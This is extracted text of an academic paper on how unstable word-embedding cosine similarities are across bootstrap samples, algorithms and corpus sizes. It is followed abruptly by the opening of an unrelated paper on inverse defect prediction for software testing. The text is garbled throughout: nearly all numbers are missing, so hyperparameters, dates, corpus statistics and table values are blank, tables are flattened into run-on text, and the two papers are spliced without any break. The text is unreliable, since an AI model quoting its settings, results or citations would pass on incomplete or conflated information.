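#                   top_n_neighbors(emb_run2, vocab, "marijuana"))
```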
some uncer- tainty is expected, and there is no clear criterion for “acceptable” levels of variance, but we argue that the amount of variation we observe is sufficient to call the whole method into question. for example, we find cases in which there is zero set overlap in “top ” lists for the same query word across bootstrap samples. smaller corpora and larger document sizes increase this variation. our goal is to provide meth- ods to quantify this variability, and to account for this variability, we recommend that as the size of a corpus gets smaller, cosine similarities should be averaged over many bootstrap samples. related work word embeddings are mappings of words to points in a k-dimensional continuous space, where k is much smaller than the size of the vocabulary. re- ducing the number of dimensions has two benefits: first, large, sparse vectors are transformed into small, dense vectors; and second, the conflation of features uncovers latent semantic relationships between the words. these semantic relationships are usually mea- sured via cosine similarity, though other metrics such as euclidean distance and the dice coefficient are possible (turney and pantel, ). we focus on four of the most popular training algorithms: la- tent semantic analysis (lsa) (deerwester et al., ), skip-gram with negative sampling (sgns) (mikolov et al., ), global vectors for word rep- resentation (glove) (pennington et al., ), and positive pointwise mutual information (ppmi) (levy and goldberg, ) (see section for more detailed descriptions of these algorithms). in nlp, word embeddings are often used as fea- tures for downstream tasks. dependency parsing (chen and manning, ), named entity recogni- tion (turian et al., ; cherry and guo, ), and bilingual lexicon induction (vulic and moens, ) are just a few examples where the use of embeddings as features has increased performance in recent years. increasingly, word embeddings have been used as evidence in studies of language and culture. for example, hamilton et al. ( ) train separate em- beddings on temporal segments of a corpus and then analyze changes in the similarity of words to measure semantic shifts, and heuser ( ) uses embeddings to characterize discourse about virtues in th cen- tury english text. other studies use cosine similar- ities between embeddings to measure the variation of language across geographical areas (kulkarni et al., ; phillips et al., ) and time (kim et al., ). each of these studies seeks to reconstruct the mental model of authors based on documents. an example that highlights the contrast between the downstream-centered and corpus-centered per- spectives is the exploration of implicit bias in word embeddings. researchers have observed that embedding-based word similarities reflect cultural stereotypes, such as associations between occupa- tions and genders (bolukbasi et al., ). from a downstream-centered perspective, these stereotypical associations represent bias that should be filtered out before using the embeddings as features. in contrast, from a corpus-centered perspective, implicit bias in embeddings is not a problem that must be fixed but rather a means of measurement, providing quantita- tive evidence of bias in the training corpus. embeddings are usually evaluated on direct use cases, such as word similarity and analogy tasks via cosine similarities (mikolov et al., ; pennington et al., ; levy et al., ; shazeer et al., ). 
intrinsic evaluations like word similarities measure the interpretability of the embeddings rather than their downstream task performance (gladkova and drozd, ), but while some research does evaluate embedding vectors on their downstream task perfor- mance (pennington et al., ; faruqui et al., ), the standard benchmarks remain intrinsic. there has been some recent work in evaluating the stability of word embeddings. levy et al. ( ) focus on the hyperparameter settings for each algo- rithm and show that hyperparameters such as the size of the context window, the number of negative sam- ples, and the level of context distribution smoothing can affect the performance of embeddings on simi- larity and analogy tasks. hellrich and hahn ( ) examine the effects of word frequency, word am- biguity, and the number of training epochs on the reliability of embeddings produced by the sgns and skip-gram hierarchical softmax (sghs) (a variant of sgns), striving for reproducibility and recommend- ing against sampling the corpus in order to preserve stability. likewise, tian et al. ( ) explore the ro- bustness of sgns and glove embeddings trained on large, generic corpora (wikipedia and news data) and propose methods to align these embeddings across different iterations. in contrast, our goal is not to produce artificially stable embeddings but to identify the factors that create instability and measure our statistical confi- dence in the cosine similarities between embeddings trained on small, specific corpora. we focus on the corpus as a fragile artifact and source of variation, considering the corpus itself as merely a sample of possible documents produced by the authors. we examine whether the embeddings accurately model those authors, using bootstrap sampling to measure the effects of adding or removing documents from the training corpus. corpora we collected two sub-corpora from each of three datasets (see table ) to explore how word embed- dings are affected by size, vocabulary, and other parameters of the training corpus. in order to bet- ter model realistic examples of corpus-centered re- search, these corpora are deliberately chosen to be publicly available, suggestive of social research ques- tions, varied in corpus parameters (e.g. topic, size, vocabulary), and much smaller than the standard cor- pora typically used in training word embeddings (e.g. wikipedia, gigaword). each dataset was created or- ganically, over specific time periods, in specific social settings, by specific authors. thus, it is impossible to expand these datasets without compromising this specificity. we process each corpus by lowercasing all text, re- moving words that appear fewer than times in the corpus, and removing all numbers and punctuation. because our methods rely on bootstrap sampling (see section ), which operates by removing or multi- plying the presence of documents, we also remove duplicate documents from each corpus. u.s. federal courts of appeals the u.s. federal courts of appeals are regional courts that decide ap- peals from the district courts within their federal ju- dicial circuit. we examine the embeddings of the most recent five years of the th and th circuits. https://www.courtlistener.com/ corpus number of documents unique words vocabulary density words per document nyt sports ( ) , , . nyt music ( ) , , . askscience , , . askhistorians , , . th circuit , , . , th circuit , , . 
, table : comparison of the number of documents, number of unique words (after removing words that appear fewer than times), vocabulary density (the ratio of unique words to the total number of words), and the average number of words per document for each corpus. setting method tests... run run run fixed documents in consistent order variability due to algorithm (baseline) a b c a b c a b c shuffled documents in random order variability due to document order a c b b a c c b a bootstrap documents sampled with replacement variability due to document presence b a a c a b b b b table : the three settings that manipulate the document order and presence in each corpus. the th circuit contains washington d.c. and sur- rounding states, while the th circuit contains the entirety of the west coast. social science research questions might involve measuring a widely held belief that certain courts have distinct ideological ten- dencies (broscheid, ). such bias may result in measurable differences in word association due to framing effects (card et al., ), which could be observable by comparing the words associated with a given query term. we treat each opinion as a single document. new york times the new york times (nyt) an- notated corpus (sandhaus, ) contains newspaper articles tagged with additional metadata reflecting their content and publication context. to constrain the size of the corpora and to enhance their specificity, we extract data only for the year and focus on only two sections of the nyt dataset: sports and music. in the resulting corpora, the sports section is substantially larger than the music section (see table ). we treat an article as a single document. reddit reddit is a social website containing thou- sands of forums (subreddits) organized by topic. we use a dataset containing all posts for the years - from two subreddits: /r/askscience and /r/askhistorians. these two subreddits allow users to post any question in the topics of history and science, respectively. askscience is more than five times larger than askhistorians, though the doc- https://www.reddit.com/ ument length is generally longer for askhistorians (see table ). reddit is a popular data source for computational social science research; for example, subreddits can be used to explore the distinctiveness and dynamicity of communities (zhang et al., ). we treat an original post as a single document. corpus parameters order and presence of documents we use three different methods to sample the corpus: fixed, shuffled, and bootstrap. the fixed setting includes each document exactly once, and the doc- uments appear in a constant, chronological order across all models. the purpose of this setting is to measure the baseline variability of an algorithm, independent of any change in input data. algorith- mic variability may arise from random initializations of learned parameters, random negative sampling, or randomized subsampling of tokens within docu- ments. the shuffled setting includes each docu- ment exactly once, but the order of the documents is randomized for each model. the purpose of this setting is to evaluate the impact of variation on how we present examples to each algorithm. the order of documents could be an important factor for algo- rithms that use online training such as sgns. the bootstrap setting samples n documents randomly with replacement, where n is equal to the number of documents in the fixed setting. 
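the three settings just described (fixed, shuffled, and bootstrap) amount to three simple ways of building a training corpus from the same list of documents. a minimal sketch follows, assuming the corpus is an in-memory list of documents; this is an illustration of the sampling logic, not the authors' implementation.

```python
import random

def build_corpus(documents, setting, seed=0):
    """return the document sequence used to train one model.
    fixed: same documents, constant order; shuffled: same documents,
    random order; bootstrap: sample len(documents) docs with replacement."""
    rng = random.Random(seed)
    if setting == "fixed":
        return list(documents)
    if setting == "shuffled":
        docs = list(documents)
        rng.shuffle(docs)
        return docs
    if setting == "bootstrap":
        return [rng.choice(documents) for _ in range(len(documents))]
    raise ValueError(f"unknown setting: {setting}")

# e.g. one training corpus per run: build_corpus(docs, "bootstrap", seed=run_id)
```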
the purpose of this setting is to measure how much variability is due to the presence or absence of specific sequences of tokens in the corpus. see table for a comparison of these three settings. size of corpus we expect the stability of embedding-based word similarities to be influenced by the size of the training corpus. as we add more documents, the impact of any specific document should be less significant. at the same time, larger corpora may also tend to be more broad in scope and variable in style and topic, leading to less idiosyn- cratic patterns in word co-occurrence. therefore, for each corpus, we curate a smaller sub-corpus that contains % of the total corpus documents. these samples are selected using contiguous sequences of documents at the beginning of each training (this ensures that the fixed setting remains constant). length of documents we use two document seg- mentation strategies. in the first setting, each training instance is a single document (i.e. an article for the nyt corpus, an opinion from the courts corpus, and a post from the reddit corpus). in the second setting, each training instance is a single sentence. we ex- pect this choice of segmentation to have the largest impact on the bootstrap setting. documents are often characterized by “bursty” words that are locally frequent but globally rare (madsen et al., ), such as the name of a defendant in a court case. sampling whole documents with replacement should magnify the effect of bursty words: a rare but locally frequent word will either occur in a bootstrap corpus or not occur. sampling sentences with replacement should have less effect on bursty words, since the chance that an entire document will be removed from the corpus is much smaller. algorithms evaluating all current embedding algorithms and im- plementations is beyond the scope of this work, so we select four categories of algorithms that represent distinct optimization strategies. recall that our goal is to examine how algorithms respond to variation in the corpus, not to maximize performance in the accuracy or effectiveness of the embeddings. the first category is online stochastic updates, in which the algorithm updates model parameters us- ing stochastic gradients as it proceeds through the training corpus. all methods implemented in the word vec and fasttext packages follow this format, including skip-gram, cbow, negative sam- pling, and hierarchical softmax (mikolov et al., ). we focus on sgns as a popular and representative example. the second category is batch stochastic updates, in which the algorithm first collects a matrix of summary statistics derived from a pass through the training data that takes place before any parame- ters are set, and then updates model parameters using stochastic optimization. we select the glove algo- rithm (pennington et al., ) as a representative example. the third category is matrix factorization, in which the algorithm makes deterministic updates to model parameters based on a matrix of summary statistics. as a representative example we include ppmi (levy and goldberg, ). finally, to test whether word order is a significant factor we include a document-based embedding method that uses ma- trix factorization, lsa (deerwester et al., ; lan- dauer and dumais, ). these algorithms each include several hyperparam- eters, which are known to have measurable effects on the resulting embeddings (levy et al., ). 
we have attempted to choose settings of these parameters that are commonly used and comparable across algorithms, but we emphasize that a full evaluation of the effect of each algorithmic parameter would be beyond the scope of this work. for each of the following algorithms, we set the context window size to and the embeddings size to . since we remove words that occur fewer than times during preprocessing of the corpus, we set the frequency threshold for the following algorithms to . for all other hyperparameters, we follow the default or most popular settings for each algorithm, as described in the following sections.

. lsa

latent semantic analysis (lsa) factorizes a sparse term-document matrix x (deerwester et al., ; landauer and dumais, ). x is factored using singular value decomposition (svd), retaining k singular values such that x ≈ x_k = u_k σ_k v_kᵀ. the elements of the term-document matrix are weighted, often with tf-idf, which measures the importance of a word to a document in a corpus. the dense, low-rank approximation of the term-document matrix, x_k, can be used to measure the relatedness of terms by calculating the cosine similarity of the relevant rows of the reduced matrix.

we use the scikit-learn package (http://scikit-learn.org/) to train our lsa embeddings. we create a term-document matrix with tf-idf weighting, using the default settings except that we add l2 normalization and sublinear tf scaling, which scales the importance of terms with high frequency within a document. we perform dimensionality reduction via a randomized solver (halko et al., september ).

the construction of the term-count matrix and the tf-idf weighting should introduce no variation to the final word embeddings. however, we expect variation due to the randomized svd solver, even when all other parameters (training document order, presence, size, etc.) are constant.

. sgns

the skip-gram with negative sampling (sgns) algorithm (mikolov et al., ) is an online algorithm that uses randomized updates to predict words based on their context. in each iteration, the algorithm proceeds through the original documents and, at each word token, updates model parameters based on gradients calculated from the current model parameters. this process maximizes the likelihood of observed word-context pairs and minimizes the likelihood of negative samples.

we use an implementation of the sgns algorithm included in the python library gensim (https://radimrehurek.com/gensim/models/word2vec.html) (řehůřek and sojka, ). we use the default settings provided with gensim except as described above.

we predict that multiple runs of sgns on the same corpus will not produce the same results. sgns randomly initializes all the embeddings before training begins, and it relies on negative samples created by randomly selecting word and context pairs (mikolov et al., ; levy et al., ). we also expect sgns to be sensitive to the order of documents, as it relies on stochastic gradient descent, which can be biased to be more influenced by initial documents (bottou, ).

. glove

global vectors for word representation (glove) uses stochastic gradient updates but operates on a "global" representation of word co-occurrence that is calculated once at the beginning of the algorithm (pennington et al., ). words and contexts are associated with bias parameters, b_w and b_c, where w is a word and c is a context, learned by minimizing the cost function:

l = Σ_{w,c} f(x_wc) ( w⃗ · c⃗ + b_w + b_c − log x_wc )²
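the cost function above can be written out directly; the following numpy sketch evaluates the glove objective for a given co-occurrence matrix and parameter set. it is a toy illustration of the equation, not the reference implementation, and the weighting-function constants (x_max = 100, alpha = 0.75) are the commonly quoted defaults rather than settings taken from this paper.

```python
import numpy as np

def glove_weight(x, x_max=100.0, alpha=0.75):
    # f(x_wc): down-weights rare co-occurrences, caps frequent ones at 1
    return np.where(x < x_max, (x / x_max) ** alpha, 1.0)

def glove_loss(X, W, C, b_w, b_c):
    """X: (V, V) co-occurrence counts; W, C: (V, d) word/context vectors;
    b_w, b_c: (V,) bias terms. returns the weighted least-squares loss."""
    mask = X > 0                              # log x_wc is only defined for x_wc > 0
    diff = W @ C.T + b_w[:, None] + b_c[None, :] - np.log(np.where(mask, X, 1.0))
    return float(np.sum(glove_weight(X) * mask * diff ** 2))
```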
we use the glove implementation provided by pennington et al. ( ) (http://nlp.stanford.edu/projects/glove/). we use the default settings provided with glove except as described above. unlike sgns, the algorithm does not perform model updates while examining the original documents. as a result, we expect glove to be sensitive to random initializations but not sensitive to the order of documents.

. ppmi

the positive pointwise mutual information (ppmi) matrix, whose cells represent the ppmi of each pair of words and contexts, is factored using singular value decomposition (svd) and results in low-dimensional embeddings that perform similarly to glove and sgns (levy and goldberg, ):

pmi(w, c) = log [ p(w, c) / (p(w) p(c)) ];  ppmi(w, c) = max(pmi(w, c), 0).

to train our ppmi word embeddings, we use hyperwords (https://bitbucket.org/omerlevy/hyperwords/src), an implementation provided as part of levy et al. ( ). we follow the authors' recommendations and set the context distributional smoothing (cds) parameter to . , the eigenvalue matrix (eig) to . , the subsampling threshold (sub) to - , and the context window (win) to . we altered the ppmi code to remove a fixed random seed in order to introduce variability given a fixed corpus; no other change was made.

like glove and unlike sgns, ppmi operates on a pre-computed representation of word co-occurrence, so we do not expect results to vary based on the order of documents. unlike both glove and sgns, ppmi uses a stable, non-stochastic svd algorithm that should produce the same result given the same input, regardless of initialization. however, we expect variation due to ppmi's random subsampling of frequent tokens.

methods

to establish statistical significance bounds for our observations, we train lsa models, sgns models, glove models, and ppmi models for each of the three settings (fixed, shuffled, and bootstrap), for each document segmentation size, for each corpus. for each corpus, we select a set of relevant query words from high probability words from an lda topic model (blei et al., ) trained on that corpus with topics. we calculate the cosine similarity of each query word to the other words in the vocabulary, creating a similarity ranking of all the words in the vocabulary. we calculate the mean and standard deviation of the cosine similarities for each pair of query word and vocabulary word across each set of models. from the lists of queries and cosine similarities, we select the words most closely related to the set of query words and compare the mean and standard deviation of those pairs across settings. we calculate the jaccard similarity between top-n lists to compare membership change in the lists of most closely related words, and we find average changes in rank within those lists. we examine these metrics across different algorithms and corpus parameters.

results

we begin with a case study of the framing around the query term marijuana. one might hypothesize that the authors of various corpora (e.g. judges of the th circuit, journalists at the nyt, and users on reddit) have different perceptions of this drug and that their language might reflect those differences. indeed, after qualitatively examining the lists of most similar terms (see table ), we might come to the conclusion that the allegedly conservative th circuit judges view marijuana as similar to illegal drugs such as heroin and cocaine, while reddit users view marijuana as closer to legal substances such as nicotine and alcohol. however, we observe patterns that cause us to lower our confidence in such conclusions.

table shows that the cosine similarities can vary significantly. we see that the top ranked words (chosen according to their mean cosine similarity across runs of the fixed setting) can have widely different mean similarities and standard deviations depending on the algorithm and the three training settings, fixed, shuffled, and bootstrap. as expected, each algorithm has a small variation in the fixed setting. for example, we can see the effect of the random svd solver for lsa and the effect of random subsampling for ppmi. we do not observe a consistent effect for document order in the shuffled setting.

[figure : the mean standard deviations across settings (fixed, shuffled, bootstrap) and algorithms (lsa, sgns, glove, ppmi) for the closest words to the query words in the th circuit and nyt music corpora, using the whole documents. larger variations indicate less stable embeddings.]

[table : the most similar words, with the means and standard deviations of the cosine similarities between the query word marijuana and its nearest neighbors (highest mean cosine similarity in the fixed setting), shown for each algorithm (lsa, sgns, glove, ppmi) and each corpus ( th circuit, nyt sports, reddit askscience) under the fixed, shuffled, and bootstrap settings. embeddings are learned from documents segmented by sentence.]
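aggregates of the kind reported in the table above — a mean and standard deviation of the query–neighbor cosine similarity across the models trained for one setting — can be computed along the following lines. this is a hedged sketch, assuming each trained model exposes a `similarity(word_a, word_b)` function (a gensim keyedvectors object would, for instance); it is not the evaluation code used in the paper.

```python
import statistics

def similarity_stats(models, query, neighbor):
    """mean and standard deviation of cosine(query, neighbor) across an
    ensemble of trained embedding models (the models of one setting)."""
    sims = [float(m.similarity(query, neighbor)) for m in models]
    return statistics.mean(sims), statistics.stdev(sims)

# e.g. mean, sd = similarity_stats(bootstrap_models, "marijuana", "cocaine")
```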
most importantly, these figures reveal that the bootstrap setting causes large increases in variation across all algorithms (with a weaker effect for ppmi) and corpora, with large standard deviations across word rankings. this indicates that the presence of specific documents in the corpus can significantly affect the cosine similarities between embedding vectors.

glove produced very similar embeddings in both the fixed and shuffled settings, with similar means and small standard deviations, which indicates that glove is not sensitive to document order. however, the bootstrap setting caused a reduction in the mean and widened the standard deviation, indicating that glove is sensitive to the presence of specific documents.

[table : the closest words to the query term pregnancy are highly variable (entries across runs include viability, fetus, trimester, surgery, pregnancies, abortion, visit, tenure, and others); none of the words shown appear in every run. results are shown across runs of the bootstrap setting for the full corpus of the th circuit, the whole document size, and the sgns model.]

[table : the order of the closest words to the query term evolution is highly variable (entries across runs include selection, darwinian, convergent, genetics, humans, species, natural, process, and others). results are shown across runs of the bootstrap setting for the full corpus of askscience, the whole document length, and the glove model.]

these patterns of larger or smaller variations are generalized in figure , which shows the mean standard deviation for different algorithms and settings. we calculated the standard deviation across the runs for each query word in each corpus, and then we averaged over these standard deviations. the results show the average levels of variation for each algorithm and corpus. we observe that the fixed and shuffled settings for glove and lsa produce the least variable cosine similarities, while ppmi produces the most variable cosine similarities for all settings. the presence of specific documents has a significant effect on all four algorithms (lesser for ppmi), consistently increasing the standard deviations.

we turn to the question of how this variation in standard deviation affects the lists of most similar words. are the top-n words simply re-ordered, or do the words present in the list substantially change? table shows an example of the top-n word lists for the query word pregnancy in the th circuit corpus.
observing run , we might believe that judges of the th circuit associate pregnancy most with questions of viability and abortion, while observing run , we might believe that pregnancy is most associated with questions of prisons and family visits. although the lists in this table are all produced from the same corpus and document size, the membership of the lists changes substantially between runs of the bootstrap setting. as another example, table shows results for the query evolution for the glove model and the askscience corpus. although this query shows less variation between runs, we still find cause for concern. for example, run ranks the words human and humans highly, while run includes neither of those words in the top .

these changes in top-n rank are shown in figure . for each query word for the askhistorians corpus, we find the n most similar words using sgns. we generate new top-n lists for each of the models trained in the bootstrap setting, and we use jaccard similarity to compare the lists. we observe similar patterns to the changes in standard deviation in figure : ppmi displays the lowest jaccard similarity across settings, while the other algorithms have higher similarities in the fixed and shuffled settings but much lower similarities in the bootstrap setting.

[figure : the mean jaccard similarities across settings and algorithms for the top and closest words to the query words in the askhistorians corpus (variation in top words, per algorithm and setting). larger jaccard similarity indicates more consistency in top-n membership. results are shown for the sentence document length.]

we display results for both n = and n = , emphasizing that even very highly ranked words often drop out of the top-n list. even when words do not drop out of the top-n list, they often change in rank, as we observe in figure . we show both a specific example for the query term men and an aggregate of all the terms whose average rank is within the top- across runs of the bootstrap setting. in order to highlight the average changes in rank, we do not show outliers in this figure, but we note that outliers (large falls and jumps in rank) are common. the variability across samples from the bootstrap setting indicates that the presence of specific documents can significantly affect the top-n rankings.

[figure : the change in rank across runs of the bootstrap setting for the top words, shown as "change in rank" for the single query men (whose neighbors include children, women, soldiers, boys, girls, horses, officers, people, peasants, and bodies) and as "change in rank for all queries" in aggregate, plotting rank for the current iteration against average rank. we show the change in rank of the words whose average ranking falls within the nearest neighbors of those queries. results are shown for sgns on the askhistorians corpus and the sentence document length.]

we also find that document segmentation size affects the cosine similarities. figure shows that documents segmented at a more fine-grained level produce embeddings with less variability across runs of the bootstrap setting. documents segmented at the sentence level have standard deviations clustering closer to the median, while larger documents have standard deviations that are spread more widely.
the use of embeddings as sources of evidence needs to be tempered with the understanding that fine- grained distinctions between cosine similarities are not reliable and that smaller corpora and longer docu- ments are more susceptible to variation in the cosine similarities between embeddings. when studying the top-n most similar words to a query, it is important to account for variation in these lists, as both rank and membership can significantly change across runs. therefore, we emphasize that with smaller corpora comes greater variability, and we recommend that practitioners use bootstrap sampling to generate an ensemble of word embeddings for each sub-corpus and present both the mean and variability of any sum- mary statistics such as ordered word similarities. we leave for future work a full hyperparameter sweep for the three algorithms. while these hyperpa- rameters can substantially impact performance, our goal with this work was not to achieve high perfor- mance but to examine how the algorithms respond to changes in the corpus. we make no claim that one algorithm is better than another. conclusion we find that there are several sources of variability in cosine similarities between word embeddings vec- tors. the size of the corpus, the length of individual documents, and the presence or absence of specific documents can all affect the resulting embeddings. while differences in word association are measur- able and are often significant, small differences in cosine similarity are not reliable, especially for small corpora. if the intention of a study is to learn about a specific corpus, we recommend that practitioners test the statistical confidence of similarities based on word embeddings by training on multiple bootstrap samples. acknowledgements this work was supported by nsf # , # , and the alfred p. sloan foundation. we would like to thank alexandra schofield, laure thompson, our action editor ivan titov, and our anonymous reviewers for their helpful comments. references yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning research, (feb): – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, (jan): – . tolga bolukbasi, kai-wei chang, james y. zou, venkatesh saligrama, and adam t. kalai. . man is to computer programmer as woman is to homemaker? debiasing word embeddings. in nips, pages – . léon bottou. . stochastic gradient descent tricks. in neural networks: tricks of the trade, pages – . springer. andreas broscheid. . comparing circuits: are some u.s. courts of appeals more liberal or conservative than others? law & society review, ( ), march. dallas card, amber e. boydstun, justin h. gross, philip resnik, and noah a. smith. . the media frames corpus: annotations of frames across issues. in acl. danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural networks. in emnlp, pages – . colin cherry and hongyu guo. . the unreasonable effectiveness of word representations for twitter named entity recognition. in hlt-naacl, pages – . scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): . manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. hlt-acl, pages – . 
anna gladkova and aleksandr drozd. . intrinsic evaluations of word embeddings: what can we do bet- ter? in proceedings of the st workshop on evaluating vector-space representations for nlp, pages – . yoav goldberg. . neural network methods for nat- ural language processing. synthesis lectures on hu- man language technologies. morgan & claypool pub- lishers. ian goodfellow, yoshua bengio, and aaron courville. . deep learning. mit press. nathan halko, per-gunnar martinsson, and joel a. tropp. september, . finding structure with randomness: stochastic algorithms for constructing approximate ma- trix decompositions. technical report no. - . applied & computational mathematics, california in- stitute of technology. william l. hamilton, jure leskovec, and dan jurafsky. . diachronic word embeddings reveal statistical laws of semantic change. in acl. johannes hellrich and udo hahn. . bad company– neighborhoods in neural embedding spaces considered harmful. in proceedings of coling , the th in- ternational conference on computational linguistics: technical papers, pages – . ryan heuser. . word vectors in the eighteenth- century. in ipam workshop: cultural analytics. yoon kim, yi-i chiu, kentaro hanaki, darshan hegde, and slav petrov. . temporal analysis of language through neural language models. proceedings of the acl workshop on language technologies and computational social science,. vivek kulkarni, bryan perozzi, and steven skiena. . freshman or fresher? quantifying the geographic vari- ation of language in online social media. in icwsm, pages – . thomas k. landauer and susan t. dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of acquisition, induction, and representation of knowledge. psychological review, ( ): . omer levy and yoav goldberg. . neural word embedding as implicit matrix factorization. in nips, pages – . omer levy, yoav goldberg, and ido dagan. . im- proving distributional similarity with lessons learned from word embeddings. transactions of the acl, : – . rasmus e. madsen, david kauchak, and charles elkan. . modeling word burstiness using the dirichlet dis- tribution. in proceedings of the nd international con- ference on machine learning, pages – . acm. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word rep- resentations. hlt-naacl. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in emnlp, volume , pages – . lawrence phillips, kyle shaffer, dustin arendt, nathan hodas, and svitlana volkova. . intrinsic and ex- trinsic evaluation of spatiotemporal text representations in twitter streams. in proceedings of the nd workshop on representation learning for nlp, pages – . radim řehůřek and petr sojka. . software frame- work for topic modelling with large corpora. in pro- ceedings of the lrec workshop on new chal- lenges for nlp frameworks, pages – , valletta, malta, may. elra. evan sandhaus. . the new york times annotated corpus. ldc t . linguistic data consortium. noam shazeer, ryan doherty, colin evans, and chris waterson. . swivel: improving embeddings by noticing what’s missing. arxiv: . . yingtao tian, vivek kulkarni, bryan perozzi, and steven skiena. . on the convergent properties of word embedding methods. arxiv preprint arxiv: . . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the acl, pages – . association for computational linguistics. 
peter d. turney and patrick pantel. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . ivan vulic and marie-francine moens. . bilingual word embeddings from non-parallel document-aligned data applied to bilingual lexicon induction. in proceed- ings of the acl, pages – . acl. justine zhang, william l. hamilton, cristian danescu- niculescu-mizil, dan jurafsky, and jure leskovec. . community identity and user engagement in a multi-community landscape. proceedings of icwsm. too trivial to test? an inverse view on defect prediction to identify methods with low fault risk too trivial to test? an inverse view on defect prediction to identify methods with low fault risk rainer niedermayr , , tobias röhm and stefan wagner cqse gmbh, münchen, germany institute of software technology, university of stuttgart, stuttgart, germany abstract background: test resources are usually limited and therefore it is often not possible to completely test an application before a release. to cope with the problem of scarce resources, development teams can apply defect prediction to identify fault-prone code regions. however, defect prediction tends to low precision in cross-project prediction scenarios. aims: we take an inverse view on defect prediction and aim to identify methods that can be deferred when testing because they contain hardly any faults due to their code being “trivial”. we expect that characteristics of such methods might be project-independent, so that our approach could improve cross-project predictions. method: we compute code metrics and apply association rule mining to create rules for identifying methods with low fault risk (lfr). we conduct an empirical study to assess our approach with six java open-source projects containing precise fault data at the method level. results: our results show that inverse defect prediction can identify approx. – % of the methods of a project to have a lfr; on average, they are about six times less likely to contain a fault than other methods. in cross-project predictions with larger, more diversified training sets, identified methods are even times less likely to contain a fault. conclusions: inverse defect prediction supports the efficient allocation of test resources by identifying methods that can be treated with less priority in testing activities and is well applicable in cross-project prediction scenarios. subjects data mining and machine learning, software engineering keywords testing, inverse defect prediction, fault risk, low-fault-risk methods introduction in a perfect world, it would be possible to completely test every new version of a software application before it was deployed into production. in practice, however, software development teams often face a problem of scarce test resources. developers are busy implementing features and bug fixes, and may lack time to develop enough automated unit tests to comprehensively test new code (ostrand, weyuker & bell, ; menzies & di stefano, ). furthermore, testing is costly and, depending on the criticality of a system, it may not be cost-effective to expend equal test effort to all components (zhang, zhang & gu, ). hence, development teams need to prioritize and limit their testing scope by restricting the code regions to be tested (menzies et al., ; how to cite this article niedermayr r, röhm t, wagner s. . too trivial to test? an inverse view on defect prediction to identify methods with low fault risk. peerj comput. sci. :e doi . /peerj-cs. 
submitted october accepted march published april corresponding author rainer niedermayr, niedermayr@cqse.eu academic editor mario luca bernardi additional information and declarations can be found on page doi . /peerj-cs. copyright niedermayr et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:niedermayr@�cqse.�eu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ bertolino, ). to cope with the problem of scarce test resources, development teams aim to test code regions that have the best cost-benefit ratio regarding fault detection. to support development teams in this activity, defect prediction has been developed and studied extensively in the last decades (hall et al., ; d’ambros, lanza & robbes, ; catal, ). defect prediction identifies code regions that are likely to contain a fault and should therefore be tested (menzies, greenwald & frank, ; weyuker & ostrand, ). this paper suggests, implements, and evaluates another view on defect prediction: inverse defect prediction (idp). the idea behind idp is to identify code artifacts (e.g., methods) that are so trivial that they contain hardly any faults and thus can be deferred or ignored in testing. like traditional defect prediction, idp also uses a set of metrics that characterize artifacts, applies transformations to pre-process metrics, and uses a machine-learning classifier to build a prediction model. the difference rather lies in the predicted classes. while defect prediction classifies an artifact either as buggy or non-buggy, idp identifies methods that exhibit a low fault risk (lfr) with high certainty and does not make an assumption about the remaining methods, for which the fault risk is at least medium or cannot be reliably determined. as a consequence, the objective of the prediction also differs. defect prediction aims to achieve a high recall, such that as many faults as possible can be detected, and a high precision, such that only few false positives occur. in contrast, idp aims to achieve high precision to ensure that lfr methods contain indeed hardly any faults, but it does not necessarily seek to predict all non-faulty methods. still, it is desired that idp achieves a sufficiently high recall such that a reasonable reduction potential arises when treating lfr methods with a lower priority in qa activities. research goal: we want to study whether idp can reliably identify code regions that exhibit only a lfr, whether ignoring such code regions—as done silently in defect prediction—is a good idea, and whether idp can be used in cross-project predictions. to implement idp, we calculated code metrics for each method of a code base and trained a classifier for methods with lfr using association rule mining. to evaluate idp, we performed an empirical study with the defects j dataset (just, jalali & ernst, ) consisting of real faults from six open-source projects. we applied static code analysis and classifier learning on these code bases and evaluated the results. we hypothesize that idp can be used to pragmatically address the problem of scarce test resources. more specifically, we hypothesize that a generalized idp model can be used to identify code regions that can be deferred when writing automated tests if none yet exist, as is the situation for many legacy code bases. 
contributions: ( ) the idea of an inverse view on defect prediction: while defect prediction has been studied extensively in the last decades, it has always been employed to identify code regions with high fault risk. to the best of our knowledge, the present paper is the first to study the identification of code regions with lfr explicitly. ( ) an empirical study about the performance of idp on real open-source code bases. ( ) an extension to the defects j dataset (just, jalali & ernst, ): to improve data quality and enable further research—reproduction in particular—we provide code metrics for all methods in the code bases and an indication whether they were changed in a bug-fix patch, a list of methods that changed in bug fixes only to preserve api compatibility, and association rules to identify lfr methods.

the remainder of this paper is organized as follows. "association rule mining" provides background information about association rule mining. "related work" discusses related work. "idp approach" describes the idp approach, that is, the computation of the metrics for each method, the data pre-processing, and the association rule mining to identify methods with lfr. afterward, "empirical study" summarizes the design and results of the idp study with the defects j dataset. then, "discussion" discusses the study's results, implications, and threats to validity. finally, "conclusion" summarizes the main findings and sketches future work.

association rule mining
